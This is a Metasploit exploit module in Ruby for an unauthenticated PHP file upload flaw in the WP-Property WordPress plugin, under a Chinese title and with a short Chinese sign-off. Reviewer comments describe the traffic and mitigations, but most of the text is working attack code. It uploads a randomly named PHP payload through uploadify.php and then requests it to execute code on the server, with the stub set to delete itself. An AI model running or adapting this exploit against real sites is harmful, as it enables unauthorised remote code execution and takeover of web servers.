WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description below).
#
# The plugin ships third-party/uploadify/uploadify.php, which accepts a
# multipart upload without authentication and stores the file under a
# web-reachable directory, so an uploaded .php file is executed on request.
#
# What this traffic looks like from the defending side (all taken from the
# requests built below):
#   * POST <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     with a multipart "Filedata" part whose filename is five random letters
#     followed by ".php", plus a "folder" part naming the uploadify directory.
#   * A GET for whatever path the upload response body returned.
#
# NOTE(review): the page only states that releases up to 1.35.0 are affected;
# confirm the fixed release with the vendor. Removing or blocking access to
# uploadify.php and denying PHP execution in plugin upload directories are the
# usual compensating controls for this class of flaw.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the TARGETURI option that points at the WordPress installation.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    module_info = {
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'
    }

    super(update_info(info, module_info))

    wordpress_path = OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
    register_options([wordpress_path], self.class)
  end

  # Probes for the uploadify endpoint with a plain GET.
  #
  # A 200 response only shows that uploadify.php is reachable at the expected
  # path; nothing here inspects the plugin version or the response body, so
  # "Appears" means "endpoint present", not "confirmed vulnerable".
  #
  # @return Exploit::CheckCode::Appears when the endpoint answers 200,
  #   Exploit::CheckCode::Unknown on no response or any other status
  def check
    base = target_uri.path
    # Normalise to a trailing slash so the plugin path can be appended directly.
    base << '/' unless base[-1, 1] == '/'

    response = send_request_cgi(
      'method' => 'GET',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    )

    return Exploit::CheckCode::Appears if response && response.code == 200

    Exploit::CheckCode::Unknown
  end

  # Uploads a PHP file through uploadify.php and then requests the location
  # the server reported for it.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not a 200, or does not mention the uploaded file name.
  def exploit
    base = target_uri.path
    base << '/' unless base[-1, 1] == '/'

    peer = "#{rhost}:#{rport}"

    # File name is five random letters plus ".php"; kept on the instance.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably makes the uploaded stub delete
    # itself once it runs, so the file may not remain on disk for later
    # forensics -- confirm against the PhpEXE mixin.
    stub = get_write_exec_payload(:unlink_self => true)

    form = Rex::MIME::Message.new
    form.add_part(
      stub,
      "application/octet-stream",
      nil,
      "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""
    )
    form.add_part(
      "#{base}wp-content/plugins/wp-property/third-party/uploadify/",
      nil,
      nil,
      "form-data; name=\"folder\""
    )
    # Drop the CRLF that precedes a boundary line when it sits at line start.
    post_data = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    response = send_request_cgi(
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{form.bound}",
      'data'   => post_data
    )

    # The upload counts as successful only if the body echoes the file name.
    unless response && response.code == 200 && response.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The follow-up request path is taken verbatim from the upload response body.
    upload_uri = response.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    response = send_request_raw(
      'uri'    => upload_uri,
      'method' => 'GET'
    )
  end
end
不要问我这写的是什么 怎么利用 我是说msf.